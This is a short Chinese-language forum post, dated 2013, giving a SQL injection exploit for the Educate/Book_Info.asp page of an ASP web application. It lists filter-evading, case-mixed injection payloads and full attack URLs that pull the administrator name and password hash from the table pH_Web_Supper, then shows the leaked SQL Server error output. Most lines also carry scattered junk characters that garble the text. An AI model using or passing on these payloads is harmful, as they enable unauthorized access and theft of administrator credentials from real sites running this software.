漏洞出现在Educate/Book_Info.asp
) S% W" V. R/ t& Y* N4 w+ W9 f ^6 s9 i9 j8 }
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
7 `- x0 ^" I: g & T- x) V/ r9 t
exp:如下
- S' ?+ G/ }# x7 P3 B2 [" Q+ O查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)8 r+ p% U' c6 ^% Q3 _. J
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper). c. e- ` m4 L1 G. k! D# t
* B, y8 M% _& M' T Ahttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)% _3 e' T1 I- \/ B3 u
- P; F. p4 R$ \) V1 O7 Y- u
Microsoft OLE DB Provider for SQL Server 错误 '80040e07') [2 o3 l+ n, q. I1 ^2 h" ]
* _& M8 K8 j; \9 i
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。7 |8 g2 l7 j& h8 [
" G% u" R8 r& [: r3 B# h/Educate/Book_Info.asp,行 8
2 Q2 ~$ W. b& O& E7 y7 s" f& ~3 Z* I; R3 s
% V" e% Z- v2 i# B$ Ohttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)9 I X( T" j. E# `4 P' S% a
/ ?0 T2 L* z; c: ^: d9 vMicrosoft OLE DB Provider for SQL Server 错误 '80040e07' k, K( w* |5 H1 h: {9 V5 J M# x
i+ A5 F9 {, X" }将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。. w, { G! A/ `9 ~5 q, D
, Y7 ^$ j% p6 V% z/ P- T0 g& v# u
/Educate/Book_Info.asp,行 8
9 S, @2 d8 }* @; ~ |
发表于 2013-2-16 21:44:16
收藏
支持
反对